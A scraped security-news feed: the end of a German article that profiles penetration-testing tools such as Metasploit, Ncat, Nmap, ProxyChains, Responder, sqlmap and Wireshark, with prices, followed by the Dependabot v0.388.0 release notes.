<p class="wp-block-paragraph">Metasploit ist ein Exploit-Framework von Rapid7, das für allgemeine Penetrationstests und Schwachstellenbewertungen verwendet wird. Sicherheitsexperten betrachten es als “Super-Tool”, das funktionierende Versionen fast aller bekannter Exploits enthält. Metasploit ermöglicht Sicherheitsexperten, Netzwerke und Endpunkte auf Schwachstellen zu scannen und anschließend automatisiert mögliche Exploits auszuführen, um Systeme zu übernehmen.</p>



<p class="wp-block-paragraph">Metasploit erleichtert es mit protokollspezifischen Modulen (die alle unter der Funktion Auxiliary/Server/Capture laufen) Anmeldeinformationen zu erfassen. Sicherheitsexperten können jedes dieser Module einzeln starten und konfigurieren – zudem steht ein Capture-Plug-in zur Verfügung, das diesen Prozess vereinheitlicht.</p>



<p class="wp-block-paragraph"><strong>Preis:</strong> Metasploit Pro kostet – inklusive kommerziellem Support durch Rapid7 – ab 12.000 Dollar pro Jahr. Es gibt aber auch eine kostenlose Version.</p>



<h2 class="wp-block-heading">5. <a href="https://nmap.org/ncat/" target="_blank" rel="noreferrer noopener">Ncat</a></h2>



<p class="wp-block-paragraph">Der Nachfolger des beliebten Tools Netcat heißt Ncat und kommt von den Machern von Nmap. Das Tool ermöglicht es, Daten per Kommandozeile über ein Netzwerk zu lesen und zu schreiben, bietet aber auch zusätzlich Funktionen wie SSL-Verschlüsselung. Sicherheitsexperten zufolge ist Ncat unerlässlich geworden, um TCP/UDP-Clients und -Server zu hosten und Daten von Angreifer- und Opfersystemen zu empfangen.</p>



<p class="wp-block-paragraph">Ncat ist auch ein beliebtes Tool, um eine Reverse Shell einzurichten oder Daten zu exfiltrieren. Es wurde als zuverlässiges Back-End-Tool entwickelt, um Netzwerkverbindungen zu anderen Anwendungen und Benutzern herzustellen.</p>



<p class="wp-block-paragraph"><strong>Preis:</strong> kostenlos</p>



<h2 class="wp-block-heading">6. <a href="https://nmap.org/" target="_blank" rel="noreferrer noopener">Nmap</a></h2>



<p class="wp-block-paragraph">Dieses Netzwerk-Scanning- und Mapping-Tool auf Kommandozeilen-Basis findet zugängliche Ports auf Remote Devices. Viele Sicherheitsexperten halten Nmap für eines der wichtigsten und effektivsten Tools – insbesondere im Bereich Penetration Testing ist es unerlässlich.</p>



<p class="wp-block-paragraph">Die Skripting-Engine von Nmap erkennt anschließend automatisiert weitere Schwachstellen und nutzt diese aus. Nmap unterstützt Dutzende fortschrittlicher Techniken, um Netzwerke mit IP-Filtern, Firewalls, Routern und anderen Hindernissen abzubilden. Dazu gehören auch zahlreiche Mechanismen, um TCP- und UDP-Ports zu scannen, Betriebssysteme und Versionen sowie Ping-Sweeps zu erkennen.</p>



<p class="wp-block-paragraph"><strong>Preis:</strong> kostenlos</p>



<h2 class="wp-block-heading">7. <a href="https://github.com/haad/proxychains" target="_blank" rel="noreferrer noopener">ProxyChains</a></h2>



<p class="wp-block-paragraph">Dieses Werkzeug – der De-facto-Standard für Netzwerk-Tunneling – ermöglicht es Sicherheitsexperten, Proxy-Befehle von ihrem angreifenden <a href="https://www.computerwoche.de/k/linux-open-source,3472" target="_blank" class="idgGlossaryLink">Linux</a>-Rechner aus über verschiedene kompromittierte Rechner zu senden, um Netzwerkgrenzen und Firewalls zu überwinden und dabei einer Entdeckung zu entgehen.</p>



<p class="wp-block-paragraph">ProxyChains leitet den TCP-Verkehr von Penetrationstestern durch die folgenden Proxys: TOR, SOCKS und HTTP. ProxyChains ist mit TCP-Aufklärungs-Tools wie NMAP kompatibel und verwendet standardmäßig das TOR-Netzwerk. Sicherheitsexperten verwenden ProxyChains auch bei der IDS/IPS-Erkennung.</p>



<p class="wp-block-paragraph"><strong>Preis:</strong> kostenlos</p>



<h2 class="wp-block-heading">8. <a href="https://github.com/SpiderLabs/Responder" target="_blank" rel="noreferrer noopener">Responder</a></h2>



<p class="wp-block-paragraph">Responder ist ein NBT-NS (NetBIOS Name Service), LLMNR (Link-Local Multicast Name Resolution) und mDNS (Multicast DNS) Poisoner. Penetration Tester nutzen das Tool, um Angriffe zu simulieren, die darauf abzielen, Anmeldeinformationen und andere Daten während des Prozesses der Namensauflösung zu stehlen, wenn der DNS-Server keinen Eintrag findet. Ab Version 3.1.1.0 bietet Responder standardmäßig vollen IPv6-Support.</p>



<p class="wp-block-paragraph"><strong>Preis:</strong> kostenlos</p>



<h2 class="wp-block-heading">9. <a href="https://sqlmap.org/" target="_blank" rel="noreferrer noopener">sqlmap</a></h2>



<p class="wp-block-paragraph">Das <a class="idgGlossaryLink" href="https://www.computerwoche.de/k/linux-open-source,3472" target="_blank">Open-Source</a>-Tool sqlmap richtet sich ebenfalls an Penetrationstester und automatisiert den Prozess, SQL-Injection-Fehler zu erkennen, mit deren Hilfe Datenbankserver kompromittiert werden könnten. Das Tool verfügt über eine leistungsstarke Erkennungs-Engine und bietet zahlreiche Funktionen, darunter Datenbank-Fingerprinting und die Ausführung von Befehlen auf Betriebssystemebene über Out-of-Band-Verbindungen.</p>



<p class="wp-block-paragraph">Sqlmap unterstützt eine breite Palette von Datenbankservern, darunter:</p>



<ul class="wp-block-list">
<li><p>MySQL,</p></li>



<li><p>Oracle,</p></li>



<li><p>PostgreSQL,</p></li>



<li><p>Microsoft SQL Server,</p></li>



<li><p>Microsoft Access,</p></li>



<li><p>IBM DB2,</p></li>



<li><p>SQLite,</p></li>



<li><p>Firebird,</p></li>



<li><p>Sybase,</p></li>



<li><p>SAP MaxDB und</p></li>



<li><p>HSQLDB.</p></li>
</ul>



<p class="wp-block-paragraph"><strong>Preis:</strong> kostenlos</p>



<h2 class="wp-block-heading">10. <a href="https://www.wireshark.org/" target="_blank" rel="noreferrer noopener">Wireshark</a></h2>



<p class="wp-block-paragraph">Das Netzwerkprotokoll-Analyse-Tool Wireshark wird auch oft als Network Interface Sniffer bezeichnet. Mit Wireshark können Sicherheitsexperten das Netzwerkverhalten eines Geräts beobachten, um zu sehen, mit welchen anderen Geräten es kommuniziert und warum.</p>



<p class="wp-block-paragraph">Sicherheitsexperten zufolge eignet sich Wireshark hervorragend, um herauszufinden, wo sich DNS-Server und andere Dienste befinden, mit denen sich ein Netzwerk weiter kompromittieren lässt. Wireshark läuft nicht nur unter <a href="https://www.computerwoche.de/k/linux-open-source,3472" target="_blank" class="idgGlossaryLink">Linux</a>, sondern funktioniert mit den allen gängigen Betriebssystemen, einschließlich <a href="https://www.computerwoche.de/operating-systems/" target="_blank" class="idgGlossaryLink">Windows</a>, MacOs und Unix.</p>



<p class="wp-block-paragraph"><strong>Preis:</strong> kostenlos </p>



<p class="wp-block-paragraph">(fm)</p>



<p class="wp-block-paragraph"><strong>Dieser Beitrag ist <a href="https://www.networkworld.com/article/970926/10-essential-linux-security-tools-for-network-professionals-and-security-practitioners.html" target="_blank">im Original</a> bei unserer Schwesterpublikation Networkworld.com erschienen.</strong></p>
</div></div></div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[v0.388.0]]></title>
<description><![CDATA[What's Changed

Type GitHub release metadata by @JamieMagee in #15597
Make GitCommitChecker strongly typed by @JamieMagee in #15598
Retry corepack prepare and install on signature metadata errors from private registries by @kbukum1 in #15606
Fix UV DependencyGrapher to detect nested uv.lock in mo...]]></description>
<link>https://tsecurity.de/de/3687473/it-security-tools/v03880/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687473/it-security-tools/v03880/</guid>
<pubDate>Wed, 22 Jul 2026 21:50:45 +0200</pubDate>
<category>💾 IT Security Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>What's Changed</h2>
<ul>
<li>Type GitHub release metadata by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4898805987" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15597" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15597/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15597">#15597</a></li>
<li>Make GitCommitChecker strongly typed by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4898867087" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15598" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15598/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15598">#15598</a></li>
<li>Retry corepack prepare and install on signature metadata errors from private registries by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kbukum1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kbukum1">@kbukum1</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4906386828" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15606" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15606/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15606">#15606</a></li>
<li>Fix UV DependencyGrapher to detect nested uv.lock in monorepos by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/thavaahariharangit/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/thavaahariharangit">@thavaahariharangit</a> with @Copilot in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4829227276" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15520" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15520/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15520">#15520</a></li>
<li>Bump library/rust from 1.95.0-bookworm to 1.97.0-bookworm in /cargo by <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a>[bot] in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4867732478" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15560" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15560/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15560">#15560</a></li>
<li>Bump @sigstore/core from 3.1.0 to 3.2.1 in /npm_and_yarn/helpers by <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a>[bot] in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4777697783" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15455" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15455/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15455">#15455</a></li>
<li>Bump maven from 3.9.14 to 3.9.16 in /maven by <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a>[bot] in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4512163697" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15127" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15127/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15127">#15127</a></li>
<li>Support Bundler source cooldown in Dependabot cooldown flow by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/robaiken/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/robaiken">@robaiken</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4828748840" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15517" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15517/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15517">#15517</a></li>
<li>Type shared release metadata by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4907898455" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15607" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15607/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15607">#15607</a></li>
<li>Make Job strongly typed by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4908469606" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15608" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15608/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15608">#15608</a></li>
<li>Type Job wire models by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4908664062" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15610" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15610/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15610">#15610</a></li>
<li>Type Service and ApiClient by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4914714552" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15614" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15614/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15614">#15614</a></li>
<li>Add support for calendar-based versions for Maven and Gradle by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/yeikel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/yeikel">@yeikel</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3904944153" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/14114" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/14114/hovercard" href="https://github.com/dependabot/dependabot-core/pull/14114">#14114</a></li>
<li>Type error reporting by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4914936590" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15615" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15615/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15615">#15615</a></li>
<li>Type updater dependency helpers by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4915222773" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15617" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15617/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15617">#15617</a></li>
<li>ensure proper formatting when patching element attributes by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/brettfo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/brettfo">@brettfo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4931344457" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15629" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15629/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15629">#15629</a></li>
<li>Bump ws from 8.18.3 to 8.21.1 in /npm_and_yarn/helpers/test/npm/fixtures/vulnerability-auditor/update-needed-across-two-versions by <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a>[bot] in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4668187184" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15329" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15329/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15329">#15329</a></li>
<li>Bump lodash from 4.17.23 to 4.18.1 in /bun/helpers/test/yarn/fixtures/conflicting-dependency-parser/deeply-nested by <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a>[bot] in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4192916821" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/14608" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/14608/hovercard" href="https://github.com/dependabot/dependabot-core/pull/14608">#14608</a></li>
<li>Bump lodash from 4.17.23 to 4.18.1 in /npm_and_yarn/helpers/test/yarn/fixtures/conflicting-dependency-parser/deeply-nested by <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a>[bot] in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4193074043" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/14609" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/14609/hovercard" href="https://github.com/dependabot/dependabot-core/pull/14609">#14609</a></li>
<li>Bump lodash from 4.17.23 to 4.18.1 in /npm_and_yarn/helpers/test/npm6/fixtures/conflicting-dependency-parser/deeply-nested by <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a>[bot] in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4193583048" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/14610" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/14610/hovercard" href="https://github.com/dependabot/dependabot-core/pull/14610">#14610</a></li>
<li>Bump the dev-dependencies group across 1 directory with 2 updates by <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a>[bot] in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4248765071" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/14694" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/14694/hovercard" href="https://github.com/dependabot/dependabot-core/pull/14694">#14694</a></li>
<li>Bump pip from 26.1.1 to 26.1.2 in /python/helpers in the pip group across 1 directory by <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a>[bot] in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2923161633" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/11830" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/11830/hovercard" href="https://github.com/dependabot/dependabot-core/pull/11830">#11830</a></li>
<li>Bump yaml from 2.3.1 to 2.9.0 in /bun/helpers by <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a>[bot] in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4139279209" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/14535" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/14535/hovercard" href="https://github.com/dependabot/dependabot-core/pull/14535">#14535</a></li>
<li>npm_and_yarn: group vulnerability auditor blocking-dependency messages by top-level ancestor by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/thavaahariharangit/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/thavaahariharangit">@thavaahariharangit</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4930247969" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15627" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15627/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15627">#15627</a></li>
<li>Bump ip-address and socks in /bun/helpers by <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a>[bot] in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4390826842" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/14924" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/14924/hovercard" href="https://github.com/dependabot/dependabot-core/pull/14924">#14924</a></li>
<li>Bump brace-expansion from 1.1.13 to 1.1.16 in /bun/helpers/test/yarn/fixtures/conflicting-dependency-parser/deeply-nested by <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a>[bot] in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4933097377" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15634" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15634/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15634">#15634</a></li>
<li>Bump brace-expansion from 1.1.13 to 1.1.16 in /npm_and_yarn/helpers/test/yarn/fixtures/conflicting-dependency-parser/deeply-nested by <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a>[bot] in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4933096299" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15633" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15633/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15633">#15633</a></li>
<li>Bump sigstore/cosign/cosign from v3.1.1 to v3.1.2 in /docker in the regclient group across 1 directory by <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a>[bot] in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4923388299" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15621" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15621/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15621">#15621</a></li>
<li>Bump lodash from 4.17.23 to 4.18.1 in /bun/helpers/test/npm6/fixtures/conflicting-dependency-parser/deeply-nested by <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a>[bot] in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4191577844" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/14606" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/14606/hovercard" href="https://github.com/dependabot/dependabot-core/pull/14606">#14606</a></li>
<li>Bump @tootallnate/once from 2.0.0 to 2.0.1 in /bun/helpers by <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a>[bot] in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4496516067" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15107" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15107/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15107">#15107</a></li>
<li>Bump the "uv-ecosystem" group with 1 update across multiple ecosystems by <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a>[bot] in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4416107122" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/14969" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/14969/hovercard" href="https://github.com/dependabot/dependabot-core/pull/14969">#14969</a></li>
<li>Bump ip-address and socks in /npm_and_yarn/helpers by <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a>[bot] in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4390825489" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/14923" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/14923/hovercard" href="https://github.com/dependabot/dependabot-core/pull/14923">#14923</a></li>
<li>Bump yaml from 2.3.1 to 2.9.0 in /npm_and_yarn/helpers by <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a>[bot] in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4139269626" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/14533" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/14533/hovercard" href="https://github.com/dependabot/dependabot-core/pull/14533">#14533</a></li>
<li>Bump golang.org/x/mod from 0.37.0 to 0.38.0 in /go_modules/helpers by <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a>[bot] in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4867732391" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15559" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15559/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15559">#15559</a></li>
<li>Bump @sigstore/verify from 3.1.0 to 3.1.1 in /npm_and_yarn/helpers by <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a>[bot] in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4790653064" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15477" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15477/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15477">#15477</a></li>
<li>julia: don't propose compat updates for workspace packages or synthesize member compat entries by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/IanButterworth/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/IanButterworth">@IanButterworth</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4939811993" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15643" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15643/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15643">#15643</a></li>
<li>fix: guard against unparseable versions in cooldown fallback by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/currantw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/currantw">@currantw</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4933037458" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15632" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15632/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15632">#15632</a></li>
